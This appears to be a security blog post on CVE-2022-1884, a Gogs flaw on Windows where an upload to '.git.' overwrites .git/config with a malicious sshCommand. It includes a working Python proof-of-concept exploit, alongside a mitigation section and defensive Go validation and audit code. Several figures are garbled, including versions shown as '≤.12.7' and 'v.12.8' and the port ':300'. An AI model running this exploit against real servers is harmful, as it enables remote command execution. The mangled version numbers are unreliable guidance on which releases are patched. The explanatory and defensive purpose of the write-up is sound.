CVE-2022-1884 - Remote Command Execution in Gogs ≤.12.7 on Windows via Malicious File Upload
CVE-2022-1884 is a serious vulnerability discovered in Gogs, a popular self-hosted Git service. Found in all versions up to and including .12.7 when installed on Windows servers, this flaw allows remote attackers to execute commands on the server. This post dives deep into how the vulnerability works, real-world exploitation, and how you can protect your server.
- Affected Software: Gogs ≤ .12.7 (Windows only)
- CVE Number: CVE-2022-1884
- Result: Remote command execution as the Gogs process user
2. How the Vulnerability Works
When handling file uploads (for example, via the web interface), Gogs lets users specify a destination directory using the tree_path parameter. Normally, this should be sanitized so users can’t access internal directories. However, on Windows, a crafted path (like .git.) will resolve to the real .git folder because Windows ignores a trailing dot in filenames.
This means an attacker can upload files directly into the repository’s .git directory, including .git/config. If they overwrite or append a malicious [core] sshCommand directive, Gogs will execute arbitrary commands next time it interacts with the repo using SSH.
The sshCommand option was intended for advanced Git use, but in this context, it lets attackers run any command—a classic remote command execution (RCE) vector.
3. Exploitation Steps
1. Authentication: The attacker logs in to Gogs (registered user required).
2. Create/upload file: They use the "upload file" feature to upload a fake config file, supplying tree_path=.git. as the target directory.
3. Overwrite config: The attacker's file payload overwrites or adds a malicious [core] section to .git/config, such as an sshCommand entry pointing at an executable of the attacker's choosing (the proof of concept below uses calc.exe).
4. Trigger action: The attacker performs an action that causes Gogs to use Git over SSH for this repository (e.g., pushing or pulling).
5. Execution: Gogs calls Git, which uses the compromised .git/config. The specified command runs on the server.
4. Code Snippet: Proof of Concept
Below is a simple Python POC script demonstrating how to upload a malicious config file into a Gogs repository’s .git directory using the vulnerable tree_path parameter.
```python
import requests

GOGS_URL = "http://target-gogs-server:300"
USERNAME = "attacker"
PASSWORD = "password"
REPO_OWNER = "attacker"
REPO_NAME = "victim-repo"

# Step 1: Login and get session
session = requests.Session()
login_data = {"user_name": USERNAME, "password": PASSWORD}
r = session.post(f"{GOGS_URL}/user/login", data=login_data)
if r.ok:
    print("[+] Logged in successfully")

    # Step 2: Prepare malicious .git/config file payload
    files = {
        'file': ('config', b'[core]\nsshCommand = calc.exe\n')  # Change payload as needed
    }
    data = {
        'commit_summary': 'Malicious commit',
        'tree_path': '.git.',  # Exploit the vulnerability: Windows drops the trailing dot, so this resolves to .git
    }

    # Step 3: Upload malicious config
    upload_url = f"{GOGS_URL}/{REPO_OWNER}/{REPO_NAME}/upload/master"
    r = session.post(upload_url, data=data, files=files)
    if r.ok:
        print("[+] Malicious .git/config uploaded.")
    else:
        print("[-] Upload failed.")
else:
    print("[-] Login failed.")
```
Note: This will open Calculator as a simple demonstration. In a real attack, the payload could download & execute malware, open a reverse shell, etc.
5. Mitigation & Patches
- Status: Fixed in Gogs v.12.8.
- Upgrade: Update your Gogs installation to v.12.8 or later.
- Temporary Workaround: Restrict upload access to trusted users, and block file uploads in shared or public instances if possible.
- Official Patch: The Gogs team updated input sanitization for tree_path and blocked access to the .git directory via file uploads.
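The fix described here comes down to validating tree_path with the same name rules Windows applies (section 2 above). The following Go code is an added example written for this post, not the Gogs patch itself: IsSafeTreePath normalizes each path segment the way Windows does before comparing it against .git, and ConfigSetsSSHCommand is an audit helper that flags a core.sshCommand entry in an existing .git/config (function names and sample inputs are this example's own).

```go
package main

import (
	"fmt"
	"strings"
)

// IsSafeTreePath rejects absolute paths, traversal, and any segment that
// resolves to ".git" once Windows name rules are applied: trailing dots and
// spaces are dropped and names are case-insensitive, so ".git." is ".git".
func IsSafeTreePath(treePath string) bool {
	unified := strings.ReplaceAll(treePath, "\\", "/") // Windows accepts both separators
	if strings.HasPrefix(unified, "/") || strings.Contains(unified, ":") {
		return false // absolute, drive-qualified or stream-style destinations are never valid
	}
	for _, seg := range strings.Split(unified, "/") {
		if seg == "" || seg == "." {
			continue
		}
		norm := strings.ToLower(strings.TrimRight(seg, ". "))
		if norm == "" || norm == ".." || norm == ".git" {
			return false
		}
	}
	return true
}

// ConfigSetsSSHCommand reports whether .git/config text sets core.sshCommand,
// a key an upload must never be able to write; useful as a post-patch audit.
func ConfigSetsSSHCommand(config string) bool {
	section := ""
	for _, line := range strings.Split(config, "\n") {
		line = strings.TrimSpace(line)
		if strings.HasPrefix(line, "[") && strings.HasSuffix(line, "]") {
			section = strings.ToLower(strings.Trim(line, "[]"))
			continue
		}
		key := strings.ToLower(strings.TrimSpace(strings.SplitN(line, "=", 2)[0]))
		if section == "core" && key == "sshcommand" {
			return true
		}
	}
	return false
}

func main() {
	fmt.Println(IsSafeTreePath("src/main.go"), IsSafeTreePath(".git./config")) // true false
	fmt.Println(ConfigSetsSSHCommand("[core]\n\tsshCommand = calc.exe\n"))       // true
}
```

Run the audit helper over every repository's .git/config on a patched server to find configs that were tampered with before the upgrade.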
6. References
- CVE-2022-1884 NVD Record
- Gogs Security Release v.12.8
- Git configuration option: core.sshCommand
- Original Issue Report
Conclusion
CVE-2022-1884 is a reminder of how small oversights in input validation—especially around file paths on Windows—can create major risks. If you run Gogs on Windows, upgrade now. File uploads and repository configurations must always be treated as potential attack vectors!
Share this to help your fellow sysadmins and never assume a trailing dot is harmless!
Timeline
Published on: 11/15/2024 11:15:07 UTC
Last modified on: 11/15/2024 20:35:02 UTC